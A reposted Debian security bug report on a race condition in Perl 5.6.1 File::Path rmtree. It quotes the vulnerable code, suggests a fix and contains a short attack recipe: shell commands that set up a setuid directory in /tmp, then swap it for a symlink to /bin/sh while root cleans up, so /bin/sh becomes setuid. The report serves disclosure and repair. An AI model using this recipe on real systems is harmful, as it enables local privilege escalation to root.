本文共 1962 字,大约阅读时间需要 6 分钟。
Package: perl-modules
Version: 5.6.1-8.7Severity: criticalFile: /usr/share/perl/5.6.1/File/Path.pmTags: securityJustification: root security holeNoting USN-44-1 e.g. in I looked in perl-N.N.N/lib/File/Path.pm and noticed that rmtree containsa race condition, allowing creation of setuid files: 170 (undef, undef, my $rp) = lstat $root or next; 171 $rp &= 07777; # don't forget setuid, setgid, sticky bits 172 if ( -d _ ) { ... 209 if (rmdir $root) { 210 ++$count; 211 } 212 else { 213 carp "Can't remove directory $root: $!"; 214 chmod($rp, ($Is_VMS ? VMS::Filespec::fileify($root) : $root)) 215 or carp("and can't restore permissions to " 216 . sprintf("0%o",$rp) . "/n"); 217 } 218 } ...Example of attack: suppose we know that root uses rmtree to clean up/tmp directories. Attacker prepares things: mkdir -p /tmp/psz/sh perl -e 'open F, ">/tmp/psz/sh/$_" foreach (1..1000)' chmod 4777 /tmp/psz/shWhile root is busy working on /tmp/psz/sh (and this can be made as slowas we like), attacker does: mv /tmp/psz/sh /tmp/psz/dummy ln -s /bin/sh /tmp/psz/shRoot would have recorded the permissions of /tmp/psz/sh, but would"restore" it to /bin/sh.I am not sure if things can almost be fixed (for those architectureswithout $force_writeable) by enclosing the chmod($rp,...) line withinif(!safe|$force_writeable){...}. Maybe it should be documented thatrmtree must only be used if you can be sure to have exclusive access tothe tree.(A few minutes ago I emailed the File::Path authors Tim.Bunce@ig.co.ukand bailey@newman.upenn.edu; Tim.Bunce bounced.)Cheers,Paul Szabo - psz@maths.usyd.edu.au School of Mathematics and Statistics University of Sydney 2006 Australia-- System InformationDebian Release: 3.0Architecture: i386Kernel: Linux pisa.maths.usyd.edu.au 2.4.22-smssvr1.5.3 #1 SMP Wed Jun 23 13:01:39 EST 2004 i686Locale: LANG=C, LC_CTYPE=CVersions of packages perl-modules depends on:ii perl 5.6.1-8.7 Larry Wall's Practical Extraction转载地址:http://qtqmb.baihongyu.com/